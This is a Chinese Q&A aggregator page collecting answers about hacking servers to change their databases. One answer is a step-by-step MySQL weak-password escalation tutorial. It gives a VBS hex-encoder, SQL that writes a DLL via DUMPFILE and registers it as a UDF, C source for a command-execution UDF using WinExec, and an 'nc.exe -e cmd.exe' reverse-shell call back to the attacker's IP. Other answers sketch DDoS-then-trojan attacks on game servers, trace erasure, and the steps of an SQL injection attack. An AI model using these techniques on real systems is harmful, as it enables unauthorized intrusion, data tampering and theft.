導航:首頁 > 配伺服器 > 如何入侵伺服器修改資料庫

如何入侵伺服器修改資料庫

發布時間:2022-06-14 00:46:29

❶ 如何進入游戲伺服器修改自己的屬性

在理論上並不難
第一:確定其伺服器,一般來說一個網路游戲都會有一個或多個伺服器構架,你必須先找到它們,可以通過檢測、偵聽客戶端與服務端的地址互防,然後順藤摸瓜找到其伺服器的真正位置,當然,如今有很多技術可以避免你找到他們,但是作為一個動態伺服器,它是沒有可能逃過偵察的
第二:找到伺服器後,你應當極盡所能的探知伺服器的狀況,也就是說你當通過各種手段了解其系統、運行特性,數據狀況,有無備份及備份時間等等,知己知彼百戰不殆!
第三:在詳細了解起伺服器狀況,就可以著手對其實行綁票等計劃,目前最好的選擇是通過DDOS手段對其進行攻擊,在其崩潰時予以入侵,將你預先編好的木馬植入,要知道,這類伺服器的資料庫都是非常大的,如果你對那游戲的程序一無所知,幾乎不可能找到你的數據存放地,而每一個網路游戲在製作之除就會考慮安全問題,所以,你下面要做的就是將游戲服務端下載出來並予以破截
第四:經過一番努力,你可能已經順利完成了你的任務,不過別著急,在你興奮之前應該先將那伺服器中你曾經光顧的痕跡抹去。。。。。。。。

❷ 怎樣入侵進入一個網站後台的資料庫!入侵!

網站的後台一般是不能進入資料庫的,(當然不排除有這種可能)
一般的網站都有自己的域名,有域名就有資料庫,可以直接訪問(就像網站一樣,輸入網址,然後就會有登陸框),如果是本地的話,安裝好伺服器和資料庫,也可以直接用地址訪問

❸ 如何黑伺服器改數據

檢測伺服器存在的相關漏洞,拿下管理許可權後從伺服器上面操作資料庫修改,改數據的時候注意主庫和備份庫的數據要同步才行

❹ 有沒有入侵游戲(手游)伺服器修改數據的可能

感謝提問,你說的情況理論上是可能的!不過那麼大個游戲公司安全人員也不是吃素的,不然還怎麼在IT混。只有那些黑客中的高手可以達到。但是這種級別的黑客是不屑做這種事情的 ,最多是拿下伺服器許可權,而不會去修改數據。當然最好還不要去干這種事情。

❺ 如何利用弱口令入侵MySQL資料庫

很早網上就有了用mysql弱口令得到webshell教程,但是這次我要說的不是得到webshell,而是直接得到系統許可權,看清楚了,是「直接」得到!

首先,我簡單說一下mysql弱口令得到系統許可權得過程:首先利用mysql腳本上傳udf dll文件,然後利用注冊UDF
DLL中自寫的Function函數,而執行任意命令

思路很簡單,網上也有一些教程,但是他們要麼沒有給具體的代碼,要麼一句話代過,搞得象我似得小菜很難理解,終於在我付出了幾天得不斷測試得辛勤勞動後,有了點結果,我把詳細過程和相關代碼得交給大家,這樣大家就可以自己寫dll文件,自己生成不同文件得二進制碼啦!

下面,我們先說如何生成二進制文件得上傳腳本。看看這段mysql腳本代碼(網友Mix用的方法):
set @a =
concat('',0x0123abc1312389…..);
set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,欄位為data,類型為longblob

insert into Mix values("");update Mix set data = @a;//@a插入表Mix
select
data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//導出表中內容為文件

前兩句很熟悉把,這個就是我們以前注入的時候,繞過』的解決辦法,把代碼的16進制數聲明給一個變數,然後導入這個變數就行了。只不過這里,因為16進制代碼是一個文件的內容,代碼太長了,所以就用了concat函數不斷把上次得代碼類加起來,這樣不斷累計到一個變數a中。後面幾句就很簡單了,我都有注釋。

後面三句好說,但是前面的那麼多16進制數據,手工的話,累人啊!不過你還記得以前有一個exe2bat.vbs腳本嗎?這次我們可以把這個腳本修改一下後,得到我們這里需要得mysql腳本!對比exe2bat.vbs生成得文件和我們需要腳本的文件格式,我們可以輕松的得到我們所需的腳本。腳本內容如下:

fp=wscript.arguments(0
fn=right(fp,len(fp)-instrrev(fp,"\"))
with
createobject("adodb.stream")
.type=1:.open:.loadfromfile
fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536

with
createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"
for i=1 to sl
bt=ascb(midb(str,i,1))

if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then
.write ");" vbcrlf "set @a = concat(@a,0x"
next
end with

好了,現在只要你把所要上傳的文件拖到這個腳本圖標上面,就可以生成一個同名的txt文件了。這個txt文件,就是我們所需要的mysql腳本,當然我們還需要修改一下這個txt文件(畢竟他是我們偷工減料得來的!),把最後一行生成的多餘的那句「set
@a = concat('',0x」刪除了,加上建表,插值得那三句代碼即可!

腳本生成了,如何上傳?先登陸mysql伺服器:

C:\>mysql –u root –h hostip –p
Mysql>use mysql;
//先進入mysql默認得資料庫,否則你下一步的表將不知道屬於哪個庫
Mysql>\. E:\*.dll.txt;
//這兒就是你生成的mysql腳本
按照上面輸入命令,就可以看見屏幕文字飛快閃爍(當然網速要快啦),不一會你的文件舊上傳完畢了!

下面到達我們的重點,我們上傳什麼dll文件?就目前我再網上看到的有兩個已經寫好的dll文件,一個是Mix寫得mix.dll,一個是envymask寫得my_udf.dll,這兩個我都用過,都很不錯,但是都也有點不足。先來看看具體的使用過程吧!

先用mix.dll:
登陸mysql,輸入命令:
Mysql> \. e:\mix.dll.txt;
Mysql>
CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';

//這兒的注冊的Mixconnect就是在我們dll文件中實現的函數,我們將要用他執行系統命令!
Mysql> select
Mixconnect('你的ip','8080'); //填寫你的反彈ip和埠

過一會兒,你監聽8080埠的nc,就會得到一個系統許可權的shell了!如圖1:

這個的確不錯,通過反彈得到得shell可以傳過一些防火牆,可惜的是,它的這個函數沒有寫得很好,只能執行一次,當你第二次連接資料庫後,再次運行「select
Mixconnect('你的ip','8080');」的時候,對方的mysql會當掉!報錯,然後服務停止!

所以,使用mix.dll你只有一次成功,沒有再來一次的機會!另外根據我的測試,他對Win2003的系統好像不起作用。
再用my_udf.dll:

Mysql>\. C:\my_udf.dll.txt
Mysql> CREATE FUNCTION my_udfdoor
RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';

//同樣地,my_udfdoor也是我們注冊後,用來執行系統命令得函數
Mysql> select my_udfdoor('』);
//這兒可以隨便寫my_udfdoor得參數,相當於我們只是要激活這個函數
好了,現在你可以不用關這個shell了,我們再開一個cmd,使用:

D:\>nc hostip 3306
*
4.0.*-nt x$Eo~MCG f**k //看到這個後,輸入「f**k」
,他是my_udfdoor默認密碼,自己無法更改
過一會兒,你就有了系統許可權的shell了,
由於他是hook
recv版,所以穿牆的能力很強,我是在上一個mix.dll反彈失敗的情況下,才使用這個得,他果然不負所望!進系統後,發現它有雙網卡,天網防火牆個人版V2.73,對外僅僅開放3306埠,由此可見,my_udf.dll確實有很強的穿透防火牆得能力!但是他也有一個bug,就是再我們連接激活這個函數後(就是使用了命令「select
my_udfdoor('』);」後),不管你是否連接,只要執行了:
Mysql>drop function my_udfdoor;
後,mysql也匯報錯,然後掛掉,

所以,你使用這個dll文件無法刪除你的痕跡!

最後,然我們自己寫一個自定義的dll文件。看能不能解決問題。

我們僅僅使用mysql 得udf的示例作模版即可!看他的示例:

#include <stdlib.h>
#include <winsock.h>
#include
<mysql.h>
extern "C" {
char *my_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null,

char *error);
// 兼容C
}
char
*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)

{
char * me = "my name";
return me;
// 調用此UDF將返回 my name
}

十分簡單吧?好,我們只需要稍微改一下就可以有了自己的dll文件了:
下面是我的一個哥們Crackme是修改的:
#include
<stdlib.h>
#include <windows.h>
#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null, char *error);// sys_name就是函數名,你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char
*is_null, char *error) //當然這兒的sys_name也得改!
{
char me[256] = {0};
if
(args->arg_count == 1){
strncpy(me,args->args[0],args->lengths[0]);

me[args->lengths[0]]='\0';
WinExec(me,SW_HIDE); //就是用它來執行任意命令

}else
strcpy(me,"do nonthing.\n");
return me;
}

好,我們編譯成sysudf.dll文件就可以了!我們來用他實驗一把!
看操作:
Mysql>\.
C:\sysudf.dll.txt
Mysql>Create function sys_name returns string soname
'C:\\windows\\sysudf.dll';
Mysql>\. Nc.exe.txt //把nc.exe也上傳上去

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');

//sys_name參數只有一個,參數指定要執行的系統命令
好,看看在Win2003中的一個反彈shell了,

當然,我們你也可以不反彈shell了,而去執行其他命令,只不過不論是否執行成功,都沒有回顯,所以要保證命令格式正確。對於這個dll文件,經過測試,不論何時「drop
function
sys_name;」,都是不會報錯的,同時也可以多次運行不同命令。至於他的缺點,就是他的穿牆能力跟Mix.dll一樣不算太強,但對於實在穿不透的牆,直接運行其他命令就是最好的選擇了。

上面三個dll文件可謂各有所短,如何選擇,就看你遇到的實際情況了。

好了,從腳本得編寫使用到dll文件編寫使用,說了這么多,現在大家應該都會了吧?題目說的是弱口令得到系統許可權,但是如果你在注入等其他過程中,爆出了config.php中的mysql密碼,不也是可以使用的嗎?這樣我們豈不是也找到繼Serv-u後又一大提權方法了嗎?

❻ 入侵資料庫

想入侵網吧資料庫 先得搞清楚網吧的交換層 也就是這個資料庫是通過什麼對外開放的

如果是通過軟體實現的 比如:萬象 PUBWIN 那麼先要解決掉軟體的限制

如果是通過WEB伺服器實現的 那可以通過暴庫和注入實現

一般的對於資料庫的入侵,大眾的方法都是以上兩種 不過大型資料庫還是需要尋找伺服器的配置漏洞實現~

❼ 求教誰給講講SQL注入攻擊的步驟

第一步:SQL注入點探測。探測SQL注入點是關鍵的第一步,通過適當的分析應用程序,可以判斷什麼地方存在SQL注入點。通常只要帶有輸入提交的動態網頁,並且動態網頁訪問資料庫,就可能存在SQL注入漏洞。如果程序員信息安全意識不強,採用動態構造SQL語句訪問資料庫,並且對用戶輸入未進行有效驗證,則存在SQL注入漏洞的可能性很大。一般通過頁面的報錯信息來確定是否存在SQL注入漏洞。
第二步:收集後台資料庫信息。不同資料庫的注入方法、函數都不盡相同,因此在注入之前,我們先要判斷一下資料庫的類型。判斷資料庫類型的方法有很多,可以輸入特殊字元,如單引號,讓程序返回錯誤信息,我們根據錯誤信息提示進行判斷,還可以使用特定函數來判斷。
第三步:猜解用戶名和密碼。資料庫中的表和欄位命名一般都是有規律的,通過構造特殊的SQL語句在資料庫中依次猜解出表名、欄位名、欄位數、用戶名和密碼。
第四步:查找Web後台管理入口。Web後台管理通常不對普通用戶開放,要找到後台管理的登錄網址,可以利用Web目錄掃描工具快速搜索到可能的登錄地址,然後逐一嘗試,便可以找到後台管理平台的登錄網址。
第五步:入侵和破壞。一般後台管理具有較高許可權和較多的功能,使用前面已破譯的用戶名、密碼成功登錄後台管理平台後,就可以任意進行破壞,比如上傳木馬、篡改網頁、修改和竊取信息等,還可以進一步提權,入侵Web伺服器和資料庫伺服器。

❽ 如何入侵資料庫

用工具找到他的主機IP 共享他的數具 , 然後找到資料庫,,連接,然後用說具庫管理工具修改他的說具信息
工具嗎很多自己找

閱讀全文

與如何入侵伺服器修改資料庫相關的資料

熱點內容
壓縮因子定義 瀏覽:966
cd命令進不了c盤怎麼辦 瀏覽:212
葯業公司招程序員嗎 瀏覽:972
毛選pdf 瀏覽:657
linuxexecl函數 瀏覽:725
程序員異地戀結果 瀏覽:372
剖切的命令 瀏覽:226
干什麼可以賺錢開我的世界伺服器 瀏覽:288
php備案號 瀏覽:989
php視頻水印 瀏覽:166
怎麼追程序員的女生 瀏覽:487
空調外壓縮機電容 瀏覽:79
怎麼將安卓變成win 瀏覽:459
手機文件管理在哪兒新建文件夾 瀏覽:724
加密ts視頻怎麼合並 瀏覽:775
php如何寫app介面 瀏覽:804
宇宙的琴弦pdf 瀏覽:396
js項目提成計算器程序員 瀏覽:944
pdf光子 瀏覽:834
自拍軟體文件夾名稱大全 瀏覽:328